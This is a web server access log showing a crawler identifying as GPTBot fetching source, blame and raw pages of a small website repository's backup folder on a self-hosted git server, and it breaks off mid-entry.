"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" -[17/Feb/2026:14:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13684] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" -[17/Feb/2026:14:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14235] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" -[17/Feb/2026:14:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13684] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" -[17/Feb/2026:14:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" -[17/Feb/2026:14:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13960] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" -[17/Feb/2026:14:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16508] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" -[17/Feb/2026:14:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14234] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" -[17/Feb/2026:14:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14847] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" -[17/Feb/2026:14:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" [Client 74.7.227.38] [Length 10979] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" -[17/Feb/2026:14:35:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" [Client 74.7.227.38] [Length 10980] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" -[17/Feb/2026:14:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16941] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10196] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets" -[17/Feb/2026:14:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" -[17/Feb/2026:14:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13814] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" -[17/Feb/2026:14:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16940] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14990] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14690] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" -[17/Feb/2026:14:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10203] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets" -[17/Feb/2026:14:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14990] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:35:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" -[17/Feb/2026:14:35:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14694] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" -[17/Feb/2026:14:35:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15934] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14329] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14326] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:36:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15935] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:36:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13173] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services" -[17/Feb/2026:14:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13172] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services" -[17/Feb/2026:14:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14590] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" [Client 74.7.227.38] [Length 9994] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" -[17/Feb/2026:14:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" [Client 74.7.227.38] [Length 11044] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup" -[17/Feb/2026:14:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14591] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" -[17/Feb/2026:14:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11960] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" -[17/Feb/2026:14:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11962] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" -[17/Feb/2026:14:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12971] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" -[17/Feb/2026:14:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" -[17/Feb/2026:14:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" -[17/Feb/2026:14:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" -[17/Feb/2026:14:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" -[17/Feb/2026:14:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" -[17/Feb/2026:14:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" -[17/Feb/2026:14:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699421] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 